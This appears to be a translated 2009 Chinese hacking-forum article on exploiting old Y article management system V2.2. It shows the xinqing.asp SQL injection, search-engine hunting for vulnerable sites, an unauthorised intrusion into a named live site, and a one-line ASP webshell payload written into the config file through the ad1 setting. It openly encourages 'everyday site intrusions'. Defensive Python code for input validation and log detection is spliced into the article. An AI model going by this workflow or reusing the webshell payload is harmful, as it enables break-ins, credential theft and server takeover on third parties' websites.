Old Y CMS injection vulnerability analysis and exploitation - vulnerability warning - the Black Bar Safety Net

ID MYHACK58:62200922690
Type myhack58
Reporter Anonymous (佚名)
Modified 2009-03-28T00:00:00


A friend asked me to help check the security of their company website, and I agreed. When I opened the site and looked it over, I found that it runs the old Y article management system V2.2. My further analysis follows.

Analysis target: the old Y article management system V2.2

I. Preliminary analysis

Since the system is ASP+ACCESS, there are a lot of restrictions on us: unlike MSSQL or MySQL, it has few extensions and built-in functions to use. In fact, for injection into ASP, PHP or JSP dynamic sites, a large part of the work is understanding the various databases. Next we go to the official website of the old Y article management system, www.laoy*.cn, open http://www.laoy*.cn/Class.asp?ID=4 and append a comma; the page responds with a prompt that the parameter is illegal, so it is filtered. I wanted to register a user and look further, but then thought that, with an ACCESS database, even if the filtering were lax, inserting a one-line Trojan into the database would be of little use, so I downloaded the source code to my machine for further analysis.

II. Vulnerability analysis

Since the code is not very large, we analyzed the main files one by one, using the regular expression ((select|update|delete|insert)+.(from|set|into)+.(where)+.*) to search the relevant ASP files. Since ACCESS does not support multi-statement queries, it is enough to search for the ASP files containing the keyword select. In xinqing.asp we find the following code:

action = Replace(Trim(Request.QueryString("action")),"'","")
id = Replace(Trim(Request.QueryString("id")),"'","")
typee = Replace(Trim(Request.QueryString("typee")),"'","")
if action="show" then
set rs=server.createobject("adodb.recordset")
' only the single quote is stripped; id is then concatenated unquoted into the SQL
sql="Select * From Yao_XinQing Where cstr(ArticleID)="&id&""
rs.open sql,conn,1,1
... (N more lines omitted)

I believe everyone can understand it: the id variable only has its single quotes stripped before it is passed into the database, which obviously produces an injection. After a quick look at what the code means, we construct our own injection URL, ?action=show&id=317, where the id value is an existing value taken from the Yao_XinQing table; put it into an injection tool and you can get the administrator username and password. Of course you can also use the tool I provide, which directly breaks out the administrator information; then submit the password to www.cmd5.com to crack it, and the rest is simple.
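As an added example (not code from the article or from the laoy8 project), the following Python uses an in-memory SQLite table as a stand-in for the ACCESS table Yao_XinQing to show why stripping single quotes does nothing for a numeric id, and what the fix looks like: an allow-list check that the id consists only of digits, plus a bound parameter instead of string concatenation. The table contents and the function names are constructed. The Classic ASP equivalent of the hardened version is IsNumeric/CLng on the input and an ADODB.Command with a parameter in place of the concatenated sql string.

```python
import re
import sqlite3
from typing import List, Optional, Tuple

# Constructed stand-in for the ACCESS table Yao_XinQing (the real schema is not on the page).
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE Yao_XinQing (ArticleID INTEGER, Title TEXT)")
_conn.executemany(
    "INSERT INTO Yao_XinQing VALUES (?, ?)",
    [(317, "article 317"), (318, "article 318")],
)


def laoy_filter(value: str) -> str:
    """Mirror of the page's filter: Replace(Trim(Request.QueryString("id")), "'", "")."""
    return value.strip().replace("'", "")


def lookup_vulnerable(raw_id: str) -> List[Tuple[int, str]]:
    """Query built by string concatenation, as in xinqing.asp.

    ArticleID is compared as a number, so no quote is ever needed in the input and
    the quote-stripping filter changes nothing about the SQL that gets executed.
    """
    sql = "SELECT ArticleID, Title FROM Yao_XinQing WHERE ArticleID=" + laoy_filter(raw_id)
    return _conn.execute(sql).fetchall()


# Allow-list: an article id is a short run of digits and nothing else.
_ID_RE = re.compile(r"\d{1,9}")


def validate_id(raw_id: str) -> Optional[int]:
    """Return the id as an int, or None when the input is not purely numeric."""
    value = raw_id.strip()
    return int(value) if _ID_RE.fullmatch(value) else None


def lookup_hardened(raw_id: str) -> List[Tuple[int, str]]:
    """Validated integer plus a bound parameter: the input never becomes SQL text."""
    article_id = validate_id(raw_id)
    if article_id is None:
        return []  # reject outright rather than trying to sanitize
    return _conn.execute(
        "SELECT ArticleID, Title FROM Yao_XinQing WHERE ArticleID = ?", (article_id,)
    ).fetchall()


if __name__ == "__main__":
    print(lookup_vulnerable("317 or 1=1"))  # both rows: the filter did not help
    print(lookup_hardened("317 or 1=1"))    # []: rejected before any SQL is built
    print(lookup_hardened("317"))           # [(317, 'article 317')]
```

The point of validate_id returning None rather than a "cleaned" value is that numeric parameters should be parsed, not sanitized: once the value is an int, there is no string left to inject.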

III. Live testing

1. Finding the old Y article management system V2.2 by keyword search

Since the "old Y article management system V2.2" has this vulnerability, let's quickly go to the network battlefield and put it into practice. The official site has already released the patched latest version V2.3, so we pick the right keyword, "Powered by laoy8 V2.2", and search it on Baidu, which finds about 34,100 related pages, as shown in Figure 1.


Figure 1: finding the old Y article management system V2.2 by keyword search

  1. Preparatory work

Since many of the sites at the front of the results have already been hit, we try to choose sites slightly further back for testing. I used their space http://www.ibk528.com/ for the attempt: with the tool I directly broke out a username and password and logged into the backend, but found that the database backup function had been deleted. What to do? Suddenly I remembered that the configuration file (inc/config.asp) is an ASP file, so it might be possible to write a one-line Trojan through the configuration settings. Looking at Admin_Setting.asp, I found that apart from ad1, ad2 and ad3, which are not filtered, the other parameters are filtered for double quotes, so we use the ad1 parameter to submit the one-line Trojan to the server locally: save the backend page as admin_setting.htm, as shown in Figure 2.


Figure 2: creating "favorable conditions"

  2. Getting the Webshell

Change the form's submit address to http://www.ibk***.com/admin/Admin_Setting.asp?Action=Edit, and set the ad1 parameter to:

"%><% execute request("#")%><%"

Then click submit; it prompts that the modification was successful. Next, connect to the configuration file with the client and use the small Trojan to upload the big one. Finally we get the Webshell; the screenshot is shown in Figure 3.
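Both the non-numeric id sent to xinqing.asp and the unfiltered ad1 value written into inc/config.asp leave clear traces, so here is an added Python example (not from the article or the project) that runs two detection rules over constructed W3C-style access log lines: a non-numeric id on xinqing.asp, and ASP delimiters (<% or %>) inside any request parameter. It also includes is_safe_setting_value, a hypothetical check for settings before they are written into an executable config file, which refuses double quotes, ASP delimiters and line breaks. The log layout, field names and addresses are constructed. Form fields posted by the browser do not appear in a standard access log, so flag_request is written to take a parsed parameter dict and should also be applied to posted fields inside the application or at a WAF.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs

# Constructed W3C-style access log lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
# The third line carries the page's ad1 payload URL-encoded, as a browser would send it.
SAMPLE_LOG = """\
2009-03-28 10:01:05 203.0.113.7 GET /xinqing.asp action=show&id=317 200
2009-03-28 10:01:09 203.0.113.7 GET /xinqing.asp action=show&id=317+and+1=1 200
2009-03-28 10:02:11 203.0.113.7 GET /admin/Admin_Setting.asp Action=Edit&ad1=%22%25%3E%3C%25+execute+request(%22%23%22)%25%3E%3C%25%22 200
2009-03-28 10:05:40 198.51.100.2 GET /Class.asp ID=4 200
"""

ASP_DELIM = re.compile(r"<%|%>")   # opening or closing ASP script delimiter
INT_RE = re.compile(r"\d+")

# Parameters that the named scripts use purely as numbers (from the page's code: xinqing.asp id).
NUMERIC_PARAMS: Dict[str, set] = {"/xinqing.asp": {"id"}}


def parse_w3c_line(line: str) -> Dict[str, object]:
    """Split one constructed log line and decode its query string into a name->value dict."""
    date, time, ip, method, stem, query, status = line.split()
    params: Dict[str, str] = {}
    if query != "-":  # W3C logs write "-" for an empty query
        params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    return {"ip": ip, "method": method, "stem": stem.lower(), "params": params, "status": int(status)}


def flag_request(stem: str, params: Dict[str, str]) -> List[str]:
    """Return a list of findings for one request (empty when nothing is suspicious)."""
    findings: List[str] = []
    for name in NUMERIC_PARAMS.get(stem, ()):
        if name in params and not INT_RE.fullmatch(params[name].strip()):
            findings.append(f"non-numeric {name}={params[name]!r}")
    for name, value in params.items():
        if ASP_DELIM.search(value):
            findings.append(f"ASP delimiter in {name}")
    return findings


def scan_log(text: str) -> List[Tuple[str, str, List[str]]]:
    """Run flag_request over every line; yields (client ip, script, findings) for hits only."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_w3c_line(line)
        findings = flag_request(rec["stem"], rec["params"])
        if findings:
            alerts.append((rec["ip"], rec["stem"], findings))
    return alerts


def is_safe_setting_value(value: str) -> bool:
    """Hypothetical guard for settings stored in an .asp config file.

    A value that can close the string literal (") or the script block (%>) turns a
    configuration write into code execution, so such values are refused outright.
    """
    return not ('"' in value or "\r" in value or "\n" in value or ASP_DELIM.search(value))


if __name__ == "__main__":
    for ip, stem, findings in scan_log(SAMPLE_LOG):
        print(ip, stem, "; ".join(findings))
    print(is_safe_setting_value('"%><% execute request("#")%><%"'))  # False
```

Storing settings in the database, or in a file that the ASP engine never executes, removes the problem entirely; the check above is the smaller change when the file layout has to stay.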


Figure 3: the Webshell obtained

* Summary of experience

There is no advanced technique in this article; I just want to remind everyone that when there is no database backup function, we can use the configuration settings to insert the one-line Trojan. I hope this helps a little with your everyday site intrusions. The above-mentioned website was patched first, so don't go and test it; if you find other vulnerabilities, heroes, please show mercy and don't hang a horse on my website. Thank you.